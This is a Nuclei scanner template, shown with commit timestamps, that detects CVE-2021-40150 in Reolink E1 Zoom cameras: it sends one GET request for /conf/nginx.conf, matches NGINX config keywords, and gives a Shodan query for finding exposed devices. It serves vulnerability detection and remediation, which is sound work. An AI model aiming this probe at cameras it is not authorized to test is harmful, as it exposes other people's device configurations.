nuclei-templates/http/cves/2021/CVE-2021-40150.yaml

49 lines
1.7 KiB
YAML
Raw Normal View History

2022-06-07 04:57:22 +00:00
id: CVE-2021-40150
info:
name: Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure
2022-06-07 04:57:22 +00:00
author: For3stCo1d
severity: high
2022-06-07 10:08:34 +00:00
description: |
Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150).
2022-06-07 04:57:22 +00:00
reference:
- https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt
- https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt
2022-06-07 10:08:34 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150
- https://nvd.nist.gov/vuln/detail/CVE-2021-40150
2022-06-13 14:06:25 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
2022-06-13 14:06:25 +00:00
cve-id: CVE-2021-40150
cwe-id: CWE-552
2023-10-14 11:27:55 +00:00
epss-score: 0.01002
epss-percentile: 0.81944
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:*
2022-06-07 04:57:22 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 12:09:01 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: reolink
product: e1_zoom_firmware
2023-09-06 12:09:01 +00:00
shodan-query: http.title:"Reolink"
2022-06-07 10:08:34 +00:00
tags: cve,cve2021,reolink,camera,exposure,iot
2022-06-07 04:57:22 +00:00
http:
2022-06-07 04:57:22 +00:00
- method: GET
path:
- "{{BaseURL}}/conf/nginx.conf"
matchers-condition: and
matchers:
- type: word
words:
- "server"
- "listen"
- "fastcgi"
condition: and
- type: status
status:
- 200